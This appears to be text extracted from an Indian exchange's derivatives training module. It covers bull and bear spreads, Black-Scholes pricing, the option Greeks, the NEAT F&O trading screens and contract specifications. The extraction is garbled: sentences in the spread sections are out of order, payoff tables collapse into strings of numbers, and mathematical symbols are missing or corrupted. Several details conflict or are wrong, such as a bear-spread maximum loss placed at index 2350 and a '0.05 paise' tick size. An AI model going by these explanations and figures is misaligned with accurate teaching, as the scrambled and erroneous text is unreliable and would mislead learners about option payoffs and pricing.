A spread trading strategy involves taking a position in two or more options of the same type. however in the event that the market does not rise. Compared to buying the underlying asset itself.11 shows the profits/losses for a bull spread. 5.Figure 5. you would like to limit your downside. The buyer of a bull spread buys a call with an exercise price below the current index level and sells a call option with an exercise price above the current index level. Figure 5. As can be seen.50. The spread is a bull spread because the trader hopes to profit from a rise in the index. the position starts making profits (cutting losses) until the index reaches 4200. The trade is a spread because it involves buying one option and selling a related option.11: Payoff for a bull spread created using call options The figure 5.10 shows the profits/losses for a buyer of puts at various strike prices. How does one go about doing this? This is basically done utilizing two call options having the same expiration date. The downside on the position is limited to this amount. The cost of setting up the spread is Rs. the bull spread with call options limits the trader’s risk. one sold at Rs. the profits made on the long call position get offset by the losses made on the short call position and hence the maximum profit on this spread is made if the index on the expiration day closes at 4200.80 whereas the out-of-the-money option has the lowest premium of Rs.4. two or more calls or two or more puts. As the index moves above 3800. but the bull spread also limits the profit potential. A spread that is designed to profit if the price goes up is called a bull spread. the payoff obtained is the sum of the payoffs of the two calls.4 Bull spreads . but different exercise prices. Hence the payoff on this spread lies between -40 46 .Buy a call and sell another There are times when you think the market is going to rise over the next two months.80. that is. The in-themoney option has the highest premium of Rs.64.40 which is the difference between the call premium paid and the call premium received. Beyond 4200.40 and the other bought at Rs.10: Payoff for buyer of put option at various strikes The figure 5. 18. One way you could do this is by entering into a spread.
we can have three types of bull spreads: 1. 3. One call initially in-the-money and one call initially out-of-the-money.2 gives the profit/loss incurred on a spread position as the index changes. it limits both the upside potential as well as the downside risk.11 shows the payoff from the bull spread. This is the maximum loss that the position will make. Beyond an index level of 4200. In short. The decision about which of the three spreads to undertake depends upon how much risk the investor is willing to take.80) minus the call premium received (Rs. Both calls initially out-of-the-money. but not above 4200 would buy this spread. The most aggressive bull spreads are of type 1. Broadly. which is Rs.360. Figure 5.to 360. The cost of the bull spread is the cost of the option that is purchased. and Both calls initially in-the-money.40. less the cost of the option that is sold. Illustration 5. They cost very little to set up. 47 . Hence he does not want to buy a call at 3800 and pay a premium of 80 for an upside he believes will not happen. any profits made on the long call position will be cancelled by losses made on the short call position. but have a very small probability of giving a high payoff. effectively limiting the profit on the combination. Somebody who thinks the index is going to rise. 2. The cost of setting up the spread is the call premium paid (Rs.40). On the other hand. Illustration 5.3: Expiration day cash flows for a Bull spread using two-month calls The table shows possible expiration day profit for a bull spread created by buying calls at a strike of 3800 and selling calls at a strike of 4200. the maximum profit on the spread is limited to Rs.
but different exercise prices. In short. One way you could do this is by entering into a spread. 48 .) 0 0 0 0 0 0 0 0 0 0 0 -50 -100 0 0 0 50 100 150 200 250 300 350 400 400 400 -40 -40 -40 +10 +60 +110 +160 +210 +260 +310 +360 +360 +360 5. but it also limits the profit potential. Figure 5. The buyer of a bear spread buys a call with an exercise price above the current index level and sells a call option with an exercise price below the current index level. However in the event that the market does not fall.sell a call and buy another There are times when you think the market is going to fall over the next two months. you would like to limit your downside. two or more calls or two or more puts.4 gives the profit/loss incurred on a spread position as the index changes.5 Bear spreads . A bear spread created using calls involves initial cash inflow since the price of the call sold is greater than the price of the call purchased. The trade is a spread because it involves buying one option and selling a related option. the bear spread with call options limits the trader’s risk. the strike price of the option purchased is greater than the strike price of the option sold. The spread is a bear spread because the trader hopes to profit from a fall in the index. it limits both the upside potential as well as the downside risk.12 shows the payoff from the bear spread. In a bear spread.4. that is. This is basically done utilizing two call options having the same expiration date. A spread trading strategy involves taking a position in two or more options of the same type. Compared to buying the index itself. A spread that is designed to profit if the price goes down is called a bear spread. Illustration 5.
The downside on this spread position is limited to this amount. One call initially in-the-money and one call initially out-of-the-money. 100 which is the difference between the call premium received and the call premium paid. the profits made on the long call position get offset by the losses made on the short call position. the position starts making losses (cutting profits) until the spot reaches 4200. one sold at Rs.50. the net loss on the spread turns out to be 300. 150 and the other bought at Rs. The decision about which of the three spreads to undertake depends upon how much risk the investor is willing to take.100. (4200-3800). the payoff obtained is the sum of the payoffs of the two calls. Beyond 4200. but have a very small probability of giving a high payoff. The upside on the position is limited to this amount. Figure 5. As we move from type 1 to type 2 and from type 2 to type 3. 3. Hence the payoff on this spread lies between +100 to -300. The maximum loss on this spread is made if the index on the expiration day closes at 2350. the spreads become more conservative and cost higher to set up.Broadly we can have three types of bear spreads: 1. Bear spreads can also be created by buying a put with a high strike price and selling a put with a low strike price. However the initial inflow on the spread being Rs. Both calls initially out-of-the-money. 2.12: Payoff for a bear spread created using call options The figure 5. The most aggressive bear spreads are of type 1.e. and Both calls initially in-the-money. 49 . At this point the loss made on the two call position together is Rs.400 i. As the index moves above 3800. The maximum gain from setting up the spread is Rs. As can be seen. They cost very little to set up.12 shows the profits/losses for a bear spread.
150) and the premium paid for the call bought (Rs. The maximum profit obtained from setting up the spread is the difference between the premium received for the call sold (Rs. 100. Beyond an index level of 4200. effectively limiting the profit on the combination.. any profits made on the long call position will be canceled by losses made on the short call position.) +100 +100 +100 +50 0 -50 -100 -150 -200 -250 -300 -300 -300 50 . In this case the maximum loss obtained is limited to Rs.50) which is Rs.300.Illustration 5.
Today most calculators and spread-sheets come with a built-in Black-Scholes options pricing formula so to price options we don’t really need to memorize the formula. It however falls with the rise in strike price as the payoff (S-X) falls. but his upside is potentially unlimited. Option prices tend to fall as contracts are close to expiry. 4 The Black-Scholes Option Pricing Model was developed in 1973 51 . Just like in other free markets. Time for expiration of contract (T) risk free rate of return (r) and Dividend on the asset (D). Similarly price of a call option is negatively related with size of anticipated dividends. 6. The opposite is true for the price of put options. Thereafter we discuss the Black-Scholes Option pricing model4 . This chapter first looks at the key variable affecting an option’s price. Price of put option positively related with size of anticipated dividends. The chapter ends with an overview of option Greeks used for hedging portfolios with option contracts. The rise in volatility levels of the stock price however leads to increase in price of both call and put options. Afterwards we describe the limit of pricing of call and put options.CHAPTER 6: Pricing of Options Contracts and Greek Letters An option buyer has the right but not the obligation to exercise on the seller. Volatility (σ) of spot price. Strike Price (X). Most popular among them are the binomial option pricing model and the much celebrated Black-Scholes model. The option price is higher for an option which has a longer period to expire. His downside is limited to this premium. This is because longer the term of an option higher is the likelihood or probability that it would be exercised. All we need to know is the variables that go into the model. The worst that can happen to a buyer is the loss of the premium paid by him. These are Spot Price (S). The rise in risk free rate tends to increase the value of call options and decrease the value of put options. There are various models which help us get close to the true price of an option.1 Variables affecting Option Pricing Option prices are affected by six factors. This optionality is precious and has a value. The price of a call option rises with rise in spot price as due to rise in prices the option becomes more likely to exercise. which is expressed in terms of the option price. It should be noted that the time factor is applicable only for American options and not European types. it is the supply and demand in the secondary market that drives the price of an option.
This is true only for European options. Symbolically it can be written as equal to S . Merton in Bell Journal of Economics and Management Science. The limits can be defined as follows: (i) The maximum price of a call option can be the price of underlying asset.. In case of stocks a call option on it can never be larger than its spot price....... The result of this analysis was the Black-Scholes differential equation which is given as (without proof)... It was later considered a major breakthrough in the area of option pricing and had a tremendous influence on the way traders price and hedge the options..... (iii) The maximun price for a put option can never be more than the present value of the strike price X (discounted at risk free rate r).... (iv) The minimum price of the European put option would always be equal to difference between present value of strike price and the spot price of the asset... 52 ......All option contracts have price limits..... According to the BSO model he option price and the stock price depend on the same underlying source of uncertainty and we can form a portfolio consisting of the stock and the option which eliminates this source of uncertainty..... Although F...Xe –rt . Black died in 1995.... Scholes published in the Journal of Political Economy and “Theory of Rational Option Pricing” by R........... This implies that one would pay a definite maximum or a definite minimum price for acquiring an option.. Such a portfolio is instantaneously riskless and must instantaneously earn the risk-free rate. Black and M... 6..2 The Black Scholes Merton Model for Option Pricing (BSO) This model of option pricing was first mentioned in articles “The Pricing of Options and Corporate Liabilities” by F..... This is true for both European and American call options........ C. 6. For the sake of simplicity the above relationships have been written for options on non dividend paying stocks.... (ii) The minimum price for a European call option would always be the difference in the spot price (S) and present value of the strike price (x). Here X has been discounted at the risk free rate.......1 Here S is stock price t is term of the option (time to maturity) r the risk free rate and ó the volatility of stock price.. In practice a minor adjustment is done is the formulae to calculate the price limits for options on dividend paying stocks... Merton and The model is based on the premise that stock price changes are random in nature but log normally distributed and that technical analysis does not matter. .... This can be symbolically expressed as Xe –rt –S. This is true for both types of options European and American..
The Black-Scholes formulas for the prices of European calls and puts with strike price X on a non-dividend paying stock are the roots of the differential equation 6. On an average there are 250 trading days in a year. When daily sigma is given. The Black Scholes model uses continuous compounding as discussed in Chapter 2. 53 . S the spot price and T the time to expiration measured in years. Thus the call option price will be • • • c = S – Xe–r T As S becomes very large both N(d1) and N(d2) are both close to 1. Similarly when ó approaches zero d1 and d2 tend to infinity so that N(d1) and N(d2) tend to 1. It also becomes similar to a forward contract with a delivery price K. One need not remember the formulae or equation as several option price calculators are available freely (in spreadsheet formats also). they need to be converted into annualized sigma. The expression N(d2) is the probability that the option will be exercised in a risk neutral world. • Sigma annual = sigma daily × vNumber of trading days per year. Similarly the put option price will be 0 as N(-d1) and N (-d2) will be close to 0.5 (without proof): • • N(x) is the cumulative distribution function for a standardized normal distribution. is the annualized standard deviation of continuously compounded returns on the underlying. • The expression S0N(d1)ert is the expected value of a variable that equals ST if ST>X and is 0 otherwise in a risk neutral world. When S becomes very large a call option is almost certain to be exercised.0). • σ is a measure of volatility.0. so that N(d2) is the strike price times the probability that the strike price will be paid.0 and the value of call option is: c = S – X e–r T Thus the call price will always be the max(S – X e–r T . Here ST is the spot price at time T and X is the strike price. • • • X is the exercise price.
For example.5.The delta of a European put is – qT price of the underlying asset.1] The of a call is always positive and the of a put is always negative. dividends at rate q is N (d1)e e–qT [N (d1) .ν and ρ.6. Suppose the of a call option on a stock is 0.13 shows the delta of a stock option.5. Figure 5.3. theta. 6. It is the slope of the curve that relates the option price to the price of the underlying asset. There are five Greeks used for hedging portfolios of options with underlying assets (index or individual stocks). As the stock price (underlying asset) changes delta of the option also changes. the option price changes by about 0. vega and rho each represented by Greek letters . is the change in the price of call option per unit change in the spot = ∂C/∂S. gamma.3 The Greeks Each Greek letter measures a different dimension to the risk in an option position.1 as slope 54 . The delta of a European call on a stock paying . or 50% of the change in the stock price. Aim of traders is to manage the Greeks in order to manage their overall portfolio. Figure 6. Maintaining delta at the same level is known as delta neutrality or delta hedging. is the rate of change of option price with respect to the price of the underlying asset.Γ. . Delta of an option on the other hand is rate of change of the option price with respect to price of the underlying asset. This means that when the stock price changes by one. In order to maintain delta at the same level a given number of stocks (underlying asset) need to be bought or sold in the market. the delta of a stock is 1.1 Delta ( ) In general delta ( ) of a portfolio is change in value of portfolio with respect to change in price of underlying asset. These are used by traders who have sold options in the market. These are denoted by delta. Expressed differently.
to obtain Theta per trading day.3. the portfolio’s value is very sensitive to small changes in volatility.5 Rho (ρ) ρ The ρ of a portfolio of options is the rate of change of the value of the portfolio with respect to the interest rate. 55 . it must be divided by 250. We can either measure Θ “per calendar day” or “per trading day”. volatility changes have relatively little impact on the value of the portfolio. Θ is also referred to as the time decay of the portfolio. is the rate of change of the value of the portfolio with respect to the passage of time with all else remaining the same. If ν is high in absolute terms. It measures the sensitivity of the value of a portfolio to interest rates.2 Gamma (Γ) Γ Γ is the rate of change of the option’s Delta underlying asset. If ν is low in absolute terms.3. Θ is the change in the portfolio value when one day passes with all else remaining the same.3. the formula for Theta must be divided by 365. 6. 6. 6. In other words.3.4 Vega (ν) The vega of a portfolio of derivatives is the rate of change in the value of the portfolio with respect to volatility of the underlying asset.3 Theta (Θ) with respect to the price of the underlying asset.6. To obtain the per calendar day. it is the second derivative of the option price with respect to price of the Θ of a portfolio of options.
It is the responsibility of the trading member to maintain adequate control over persons having access to the firm’s User IDs. The number of users allowed for each trading member is notified by the exchange from time to time. It is similar to that of trading of equities in the cash market segment. • Professional clearing members: A professional clearing member is a clearing member who is not a trading member. 56 . The best way to get a feel of the trading system. • Clearing members: Clearing members are members of NSCCL. The exchange assigns a trading member ID to each trading member.1.Chapter 7: Trading of Derivatives Contracts This chapter provides an overview of the trading system for NSE’s futures and options market. Keeping in view the familiarity of trading members with the current capital market trading system. however. provides a fully automated screen-based trading for Index futures & options and Stock futures & options on a nationwide basis as well as an online monitoring and surveillance mechanism. Each trading member can have more than one user. modifications have been performed in the existing capital market trading system so as to make it suitable for trading futures and options. The second section describes the trader workstation using screenshots from trading screens at NSE. basis of trading. 7. The software for the F&O market has been developed to facilitate efficient and transparent trading in futures and options instruments. is to actually watch the screen and observe trading. 7. Client-broker relationship in derivative segment and order types and conditions. The unique trading member ID functions as a reference for all orders/trades of different users. called NEAT-F&O trading system. Typically.1 Entities in the trading system Following are the four entities in the trading system: • Trading members: Trading members are members of NSE. This section also describes how to place orders.1 Futures and Options Trading System The futures & options trading system of NSE. This ID is common for all users of a particular trading member. Each user of a trading member must be registered with the exchange and is assigned an unique user ID. banks and custodians become professional clearing members and clear and settle for their trading members. It supports an order driven market and provides complete transparency of trading operations. They carry out risk management activities and confirmation/inquiry of trades through the trading system. First section describes entities in the trading system. They can trade either on their own account or on behalf of their clients including participants.
57 . Such a user can perform all the functions such as order and trade related activities of all users. can receive end of day consolidated trade and order reports dealer wise for all branches of the trading member firm and also all dealers of the firm. it is an active order. 7. The exchange notifies the regular lot size and tick size for each of the contracts traded on this segment from time to time. If it does not find a match.1. Such a user can perform and view order and trade related activities for all dealers under that branch.1. All quantity fields are in units and price in rupees.2 Basis of trading The NEAT F&O system supports an order driven market.3 Corporate hierarchy In the F&O trading software. • Admin: Another user type. It tries to find a match on the other side of the book. a trade is generated. a trading member has the facility of defining a hierarchy amongst users of the system. • Branch manager: This term is assigned to a user who is placed under the corporate manager. This however does not affect the online data capture process. This user type facilitates the trading members and the clearing members to receive and capture on a real-time basis all the trades. 7. view and upload net position. These clients may trade through multiple trading members but settle through a single clearing member. view previous trades. When any order enters the trading system. Besides this the admin users can take online backup. If it finds a match. wherein orders match automatically. ‘Admin’ is provided to every trading member along with the corporate manager user.• Participants: A participant is a client of trading members like financial institutions. branch manager dealer and admin. view net position of all dealers and at all clients level. • Corporate manager: The term is assigned to a user placed at the highest level in a trading firm. All this information is written to comma separated files which can be accessed by any other program on a real time basis in a read only mode. The clearing members can receive and capture all the above information on a real time basis for the members and participants linked to him. Only a corporate manager can sign off any user and also define exposure limits for the branches of the firm and its dealers. exercise requests and give up requests of all the users under him. time and quantity. Order matching is essentially on the basis of security. its price. • Dealer: Dealers are users at the bottom of the hierarchy. A Dealer can perform view order and trade related activities only for oneself and does not have access to information on other dealers under either the same branch or other branches. This hierarchy comprises corporate manager. the order becomes passive and goes and sits in the respective outstanding order book in the system.
(d) Outstanding orders. and net positions entered for any of his users/dealers by entering his TM ID. branch ID and user ID. • Trading member branch manager: He can view: (a) Outstanding requests and activity log for requests entered by him by entering his own branch and user IDs. • Trading member dealer: He can only view requests entered by him. This is his default screen. branch managers and dealers) belonging to or linked to the member. • Clearing member and trading member dealer: Can only view requests entered by him. branch ID and user ID fields. The ‘Admin’ user can also view the relevant messages for trades. (b) Outstanding requests entered by his dealers and/or branch managers by either entering the branch and/or user IDs or leaving them blank.view give-up screens and exercise request for all the users (corporate managers. • Trading member corporate manager: Can view: (a) Outstanding requests and activity log for requests entered by him by entering his own branch and user IDs. (b) Outstanding orders. 58 . A brief description of the activities of each member is given below: • Clearing member corporate manager: Can view outstanding orders. exercise and give up requests in the message area. (b) Outstanding requests entered by his users either by filling the user ID field with a specific user or leaving the user ID field blank. This is his default screen. ‘Admin’ user cannot put any orders or modify & cancel them. previous trades and net position of his client trading members by putting the TM ID and leaving the branch ID and the dealer ID blank. • Clearing member and trading member corporate manager: Can view: (a) Outstanding orders. previous trades and net position entered for his branch by entering his TM ID and branch ID fields. (c) Outstanding orders. This is his default screen. However. previous trades. previous trades and net positions entered for himself by entering his own TM ID. previous trades and net position of his client trading members by putting the TM ID (Trading member identification) and leaving the branch ID and dealer ID blank.
59 .1. These conditions are broadly divided into the following categories: • • • Time conditions Price conditions Other conditions • Time conditions Day order: A day order. Timely issue of contract notes as per the prescribed format to the client Ensuring timely pay-in and pay-out of funds to and from the clients Resolving complaint of clients if any at the earliest.1.7. Partial match is possible for the order. Collection of adequate margins from the client Maintaining separate client bank account for the segregation of client money. Avoiding receipt and payment of cash and deal only through account payee cheques Sending the periodical statement of accounts to clients Not charging excess brokerage Maintaining unique client code as per the regulations. 7. as the name suggests is an order which is valid for the day on which it is entered. failing which the order is cancelled from the system. the system cancels the order automatically at the end of the day. and the unmatched portion of the order is cancelled immediately.
00.e. For such orders. price is market price).00. after the market price of the security reaches or crosses a threshold price e. as a limit order of 1030. This order is added to the regular lot book with time of triggering as the time stamp.00.g. • Other conditions Market price: Market orders are orders for which no price is specified at the time the order is entered (i. the limit price is 1030.00. the trigger is 1027. the system determines the price. Limit price: Price of the orders after triggering from stop-loss book.2 7.• Price condition Stop-loss: This facility allows the user to release an order into the system. if for stop-loss buy order.2. then this order is released into the system once the market price reaches or exceeds 1027. the trigger price has to be greater than the limit price. Cli: Cli means that the trading member enters the orders on behalf of a client. Pro: Pro means that the orders are entered on the trading member’s own account. 7. Trigger price: Price at which an order gets triggered from the stop-loss book . For the stop-loss sell order.00 and the market (last traded) price is 1023.
Relevant information for the selected contract/security can be viewed. It displays trading information for contracts selected by the user. Order Status (OS).As mentioned earlier. last traded price and indicator for net change from closing price. Figure 7. The user also gets a broadcast of all the cash market securities on the screen. 61 . The fourth line displays the closing open interest. the best way to familiarize oneself with the screen and its various segments is to actually spend some time studying a live screen. life time high open interest. contract status. the details of the selected contract or selected security defaults in the selection screen or else the current position in the market watch defaults. Market Movement (MM). 7. Most active security and so on. cannot trade in them through the system. high price. expiry. the market watch window and the inquiry window.2 shows the Market Inquiry screen of the NEAT F&O. The first line of the screen gives the Instrument type. Net Position. On line backup. open price. If a particular contract or security is selected. Previous Trades (PT). the dealer can only view the information on cash market but. Market by price (MBP): The purpose of the MBP is to enable the user to view passive orders in the market aggregated at each price and are displayed in order of best prices. Display of trading information related to cash market securities will be on “Read only” format. symbol. If a particular contract or security is selected. Figure 7. low price. total traded quantity. day high open interest. namely the carrying cost in percentage terms. day low open interest. i. The window can be invoked by pressing the [F6] key.1 gives the screen shot of the Market by Price window in the NEAT F&O. Market Inquiry (MI). The third line displays the last traded quantity. This function also will be available if the user selects the relevant securities for display on the market watch screen. The fifth line display very important information. In this section we shall restrict ourselves to understanding just two segments of the workstation screen. Market inquiry (MI): The market inquiry screen can be invoked by using the [F11] key. Outstanding Orders (OO).e. the opening open interest. The market watch window is the third window from the top of the screen which is always visible to the user. This is the main window from the dealer’s perspective. The second line displays the closing price. Activity log (AL). We shall look in detail at the Market by Price (MBP) and the Market Inquiry (MI) screens. Multiple index inquiry. current open interest. Snap Quote (SQ). the details of the selected contract or security can be seen on this screen. life time low open interest and net change from closing open interest. last traded time and the last traded date.2. The purpose of market watch is to allow continuous monitoring of contracts or securities that are of specific interest to the user.2 Inquiry window The inquiry window enables the user to view information such as Market by Price (MBP). life time high and life time low.
2: Security/contract/portfolio entry screen in NEAT F&O 62 .Figure 7.1: Market by price in NEAT F&O Figure 7.
2. This facilitates spread and combination trading strategies with minimum price risk.3 shows the spread/combination screen. The combinations orders are traded with an IOC attribute whereas spread orders are traded with ‘day’ order attribute. Based on studies carried out in international exchanges. This enables the user to input two or three orders simultaneously into the market. 7. members are required to identify orders as being proprietary or client orders. the total number of long in any contract always equals the total number of short in any contract. Figure 7. The futures market is a zero sum game i. Proprietary orders should be identified as ‘Pro’ and those of clients should be identified as ‘Cli’.3: Market spread/combination order entry 63 . while entering orders on the trading system. The total number of outstanding contracts (long/short) at any point in time is called the “Open interest”. This Open interest figure is a good indicator of the liquidity in every contract.e.2. it is found that open interest is maximum in near month expiry contracts. These orders will have the condition attached to it that unless and until the whole batch of orders finds a countermatch.4 Market spread/combination order entry The NEAT F&O trading system also enables to enter spread/combination trades. they shall not be traded. the client account number should also be provided. in the case of ‘Cli’ trades. Apart from this. Figure 7.3 Placing orders on the trading system For both the futures and the options market.7.
Index based futures Index based options Individual stock options Individual stock futures 7. 64 . Table 7.3 Futures and Options Market Instruments The F&O segment of NSE provides trading facilities for the following derivative instruments: 1. three contracts would be available for trading with the first contract expiring on the last Thursday of that month. Mini Nifty etc. 5 following semi-annual months of the cycle June/December would be available.1 Contract specifications for index futures On NSE’s platform one can trade in Nifty. Each futures contract has a separate limit order book.4 at any point in time. There would be 3 quarterly expiries. then the appropriate value of a single index futures contract would be Rs. On the Friday following the last Thursday. futures contracts having one-month. two-month and three-month expiry cycles.7. you can place buy and sell orders in the respective contracts.1 gives the contract specifications for index futures trading on the NSE. June.50 (i. Thus. (March. 4.05*50 units) on an open position of 50 units. 0. Derivatives Market Review Committee.3. BANK Nifty. On the recommendations given by the SEBI. 3.000.. Now option contracts with 3 year tenure are also available. Thus a single move in the index value would imply a resultant gain or loss of Rs. All contracts expire on the last Thursday of every month.250. a January expiration contract would expire on the last Thursday of January and a February expiry contract would cease trading on the last Thursday of February. a new contract having a three-month expiry would be introduced for trading. Depending on the time period for which you want to take an exposure in index futures contracts. All passive orders are stacked in the system in terms of price-time priority and trades take place at the passive order price (similar to the existing capital market trading system). as shown in Figure 7.NIFTY denotes a “Futures contract on Nifty index” and the Expiry date represents the last date on which the contract will be available for trading. 2. September and December) and after these. The minimum tick size for an index future contract is 0.05 units. Thus. NSE also introduced the ‘Long Term Options Contracts’ on S&P CNX Nifty for trading in the F&O segment.e.2. The Instrument type refers to “Futures contract on index” and Contract symbol . CNX IT.
a new three-month contract starts trading from the following day. The minimum tick for an index options contract is 0. there are one-month. As the January contract expires on the last Thursday of the month.4 shows the contract cycle for futures contracts on NSE’s derivatives market. if there are three serial month contracts available and the scheme of strikes is 6-1-6. As can be seen. the 26 NOV 2009 5000 CE) has it’s own order book and it’s own prices. Hence.4: Contract cycle The figure 7.2 Contract specification for index options On NSE’s index options market.a nearmonth. Table 5. three contracts are available for trading . at any given point of time. two-month and three-month expiry contracts with minimum nine different strikes available for trading. 7. each option product (for instance. 65 . For example the European style call option contract on the Nifty index with a strike price of 5000 expiring on the 26th November 2009 is specified as ’26NOV2009 5000 CE’. once more making available three index futures contracts for trading. 78 options contracts available on an index. Just as in the case of futures contracts. a middle-month and a far-month. The clearing corporation does the novation. Option contracts are specified as follows: DATE-EXPIRYMONTH-YEAR-CALL/PUT-AMERICAN/ EUROPEAN-STRIKE.Figure 7. then there are minimum 3 x 13 x 2 (call and put options) i.e. All index options contracts are cash settled and expire on the last Thursday of the month.05 paise.3.2 gives the contract specifications for index options trading on the NSE.
New contract will be introduced on the next trading day following the expiry of near month contract.1: Contract specification of S&P CNX Nifty Futures Underlying index Exchange of trading Security descriptor Contract size S&P CNX Nifty National Stock Exchange of India Limited FUTIDX Permitted lot size shall be 50 (minimum value Rs. 66 .05 Operating range of 10% of the base price The futures contracts will have a maximum of three month trading cycle . 0. Settlement price Daily settlement price will be the closing price of the futures contracts for the trading day and the final settlement price shall be the closing value of the underlying index on the last trading day of such futures contract.the near month (one).Table 7. Expiry day The last Thursday of the expiry month or the previous trading day if the last Thursday is a trading holiday.2 lakh) Price steps Price bands Trading cycle Re. Settlement basis Mark to market and final settlement will be cash settled on T+1 basis. the next month (two) and the far month (three).
the exchange commits itself to an inter-strike distance of say 100 and the scheme of strikes of 6-1-6.4 summarises the policy for introducing strike prices and determining the strike price interval for stocks and index. Table 7. 5000. long term options have 3 quarterly and 5 half yearly expiries Expiry day The last Thursday of the expiry month or the previous trading day if the last Thursday is a trading holiday. 4400 are available. 5200. 4600.2: Contract specification of S&P CNX Nifty Options Underlying index Exchange of trading Security descriptor Contract size S&P CNX Nifty National Stock Exchange of India Limited OPTIDX Permitted lot size shall be 50 (minimum value Rs. 5300. 4700. Cash settlement on T+1 basis. • Suppose the Nifty options with strikes 5600.Table 7.3 and Table 7. 67 . 2 lakh) Price steps Price bands Re. 5500. 4900. 5400. Trading cycle The options contracts will have a maximum of three month trading cycle . 0. Settlement basis Style of option Strike price interval Daily settlement price Final settlement price Generation of strikes The exchange has a policy for introducing strike prices and determining the strike price intervals. Depending on the index level Not applicable Closing value of the index on the last trading day.05 A contract specific price range based on its delta value and is computed and updated on a daily basis. the next month (two) and the far month (three). 4800. European. 4500.the near month (one). Also. New contract will be introduced on the next trading day following the expiry of near month contract. 5100. • It is to be noted that when the Nifty index level is between 4001 and 6000. Let us look at an example of how the various option strikes are generated by the exchange.
These contracts are cash settled on a T+1 basis. index options and stock options. if Nifty closes at around 4949 to ensure strike scheme of 6-1-6. • Conversely.500 > Rs.3.5 gives the contract specifications for stock futures. 68 .3: Generation of strikes for stock options Price of underlying Strike Price interval Scheme of strikes to be introduced (ITM-ATM-OTM) Less than or equal to Rs. A new contract is introduced on the trading day following the expiry of the near month contract. The expiration cycle for stock futures is the same as for index futures. Table 7.1000 2.• If the Nifty closes at around 5051 to ensure strike scheme of 6-1-6. one more strike would be required at 5700.250 = Rs.500 = Rs.3 Contract specifications for stock futures Trading in stock futures commenced on the NSE from November 2001. 100= Rs.1000 > Rs.50 = Rs.50 > Rs. Table 7. one more strike would be required at 4300.100 > Rs.5 5 10 20 20 50 5-1-5 5-1-5 5-1-5 5-1-5 10-1-10 10-1-10 Table 7. 250 > Rs.
6 gives the contract specifications for stock options. Expiry day The last Thursday of the expiry month or the previous trading day if the last Thursday is a trading holiday. A new contract is introduced on the trading day following the expiry of the near month contract. Currently these contracts are European style and are settled in cash. New contract will be introduced on the next trading day following the expiry of near month contract. the next month (two) and the far month (three). five out-of-the-money contracts and one at-the-money contract available for trading. 7.4 Contract specifications for stock options Trading in stock options commenced on the NSE from July 2001. 69 .2 lakh) Re. Settlement price Daily settlement price will be the closing price of the futures contracts for the trading day and the final settlement price shall be the closing price of the underlying security on the last trading day.the near month (one).05 Operating range of 20% of the base price The futures contracts will have a maximum of three month trading cycle .Table 7. There are at least five in-the-money contracts. Table 7. 0.e. call and put) during the trading month.3. Settlement basis Mark to market and final settlement will be cash settled on T+1 basis. NSE provides a minimum of eleven strike prices for every option type (i.
2008. 2008. The mini contracts have smaller contract size than the normal Nifty contract and extend greater affordability to individual investors and helps the individual investor to hedge risks of a smaller portfolio. the next month (two) and the far month (three).2 lakh) Re. The long term options have a life cycle of maximum 5 years duration and offer long term investors to take a view on prolonged price changes over a longer duration. 70 . New contract will be introduced on the next trading day following the expiry of near month contract. Expiry day The last Thursday of the expiry month or the previous trading day if the last Thursday is a trading holiday.the near month (one). 0. The Mini derivative (Futures and Options) contracts on S&P CNX Nifty were introduced for trading on January 1.05 Not applicable The options contracts will have a maximum of three month trading cycle . The Long Term Options Contracts on S&P CNX Nifty were launched on March 3. without needing to use a combination of shorter term option contracts.Table 7.
60 crores and stock’s median quarter-sigma order size over the last six months shall be not less than Rs.4. then no fresh month contract would be issued on that index. • The stock’s median quarter-sigma order size over the last six months should be not less than Rs. 7. 2 lakh.100 crores.4 Criteria for Stocks and Index Eligibility for Trading 7. 71 . free-float holding.2 Eligibility criteria of indices The exchange may consider introducing derivative contracts on an index if the stocks contributing to 80% weightage of the index are individually eligible for derivative trading. The market wide position limit of open position (in terms of the number of underlying stock) on futures and option contracts on a particular underlying stock shall be 20% of the number of shares held by non-promoters in the relevant underlying security i.7.. Futures & Options contracts may be introduced on (new) securities which meet the above mentioned eligibility criteria. subject to approval by SEBI. the continued eligibility criteria is that market wide position limit in the stock shall not be less than Rs. once the stock is excluded from the F&O list. The above criteria is applied every month. it shall not be considered for re-inclusion for a period of one year. For an existing F&O stock. Further. However. then no fresh month contract will be issued on that security. the existing unexpired contracts can be permitted to trade till expiry and new strikes can also be introduced in the existing contract months. 5 lakhs.4. However. a stock’s quarter-sigma order size should mean the order size (in value terms) required to cause a change in the stock price equal to one-quarter of a standard deviation. If an existing security fails to meet the eligibility criteria for three months consecutively. if the index fails to meet the eligibility criteria for three months consecutively. • The market wide position limit in the stock should not be less than Rs. However.1 Eligibility criteria of stocks • The stock is chosen from amongst the top 500 stocks in terms of average daily market capitalisation and average daily traded value in the previous six months on a rolling basis. For this purpose.e. the existing unexpired contacts will be permitted to trade till expiry and new strikes can also be introduced in the existing contracts.
1000 crores prior to its restructuring. b) In subsequent contract months. middle month and far month derivative contracts on the stock of the restructured company. the scheme of restructuring does not suggest that the post restructured company would have any characteristic (for example extremely low free float) that would render the company ineligible for derivatives trading.. b) the pre restructured company had a market capitalisation of at least Rs. likely to be at least one-third the size of the pre restructuring company in terms of revenues. 7. or assets.5% of the contract value exclusive of statutory levies. the normal rules for entry and exit of stocks in terms of eligibility requirements would apply. and d) in the opinion of the exchange. If the above conditions are satisfied. the exchange shall not permit further derivative contracts on this stock and future month series shall not be introduced.3 Eligibility criteria of stocks for derivatives trading on account of corporate restructuring The eligibility criteria for stocks for derivatives trading on account of corporate restructuring is as under: I. then the exchange takes the following course of action in dealing with the existing derivative contracts on the pre-restructured company and introduction of fresh contracts on the post restructured company a) In the contract month in which the post restructured company begins to trade. II. If these tests are not met.4. a) the Futures and options contracts on the stock of the original (pre restructure) company were traded on any exchange prior to its restructuring.7. in the opinion of the exchange. the Exchange introduce near month. However. c) the post restructured company would be treated like a new stock and if it is. or (where appropriate) analyst valuations. NSE has been periodically reviewing and reduc- 72 .5 Charges The maximum brokerage chargeable by a trading member in relation to trades effected in the contracts admitted to dealing on the F&O Segment of NSE is fixed at 2.
